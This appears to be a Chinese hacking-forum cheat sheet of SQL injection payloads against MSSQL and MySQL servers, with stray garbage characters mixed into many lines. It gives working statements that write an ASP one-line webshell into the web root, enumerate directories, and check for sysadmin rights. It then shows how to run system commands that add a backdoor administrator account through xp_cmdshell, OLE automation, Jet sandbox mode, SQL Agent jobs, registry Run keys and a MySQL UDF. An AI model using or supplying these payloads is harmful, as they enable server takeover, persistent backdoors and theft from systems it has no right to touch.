MSSQL语句导出一句话木马
首先确定网站的WEB路径
1 z7 M9 p+ x" ~ T, I9 x# e;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马" c* o3 V# b. s* r; q8 ~
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- . y$ A( m6 F+ L/ g
//将一句话木马插入表中
m' A1 U) I! o0 {;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//导出一个ASP文件
关于MSSQL列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
: K, |0 b+ X# u. F# Z# UInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
1 I+ _; Y* L, x7 |% A8 x4 R. W% Xand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段9 j h7 J: \7 D8 a+ V# x$ J
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
数据库版本和权限查看
and 1=(select @@VERSION) //查看详细的数据库信息.
. I! O3 Y3 ]3 o( N! d2 }and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA% X) W6 a" a" e H- E
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER& Z+ g+ [5 f" V! A* R7 s+ p
1.利用xp_cmdshell执行命令
exec master..xp_cmdshell 'net user rfire 123456 /add'4 m6 H+ Z& b+ B0 R
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
恢复xp_cmdshell存储过程
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' t \1 b$ n% t' b* A2 |6 |
2.利用SP_OAcreate和SP_OAMETHOD执行命令
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
* i0 `3 T9 Z& G' v, rDECLARE @shell INT //建立一个@shell实体
! M4 w* q& |% y$ ^EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例2 c/ }0 c) b7 q% j. p5 e
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例) }* C, X0 |5 S8 H2 }7 ]
3.利用沙盒模式
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
开启沙盒模式:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',02 C1 t: S% j/ u$ C4 y# f0 N
执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
4.利用SQL代理执行命令
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务+ a( e( X; b+ W8 Q. f
执行命令:
& U, }% `$ F3 ]use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
$ \ m! `- J0 Y, F1 _' L/ e: mexec sp_add_job 'x': {% P0 x& c4 f8 x6 p) W
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
# m) h* |2 _' I$ ]2 B3 h* U/ ]4 Yexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业! Q% Z* L0 f: n7 d& @3 }
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
9 |6 M+ ]6 t) C+ Y q8 H bEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add': t" s4 X8 d( z8 Z! R+ b7 `7 x) v
6.MYSQL的命令执行
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
首先要在su.php下导出c:\windows\udf.dll
导出后执行创建自定义函数命令:
) }" _( l+ y* \Create Function cmdshell returns string soname 'udf.dll'
执行命令
select cmdshell('net user rfire 123456 /add')
执行后删除函数 drop function cmdshell
|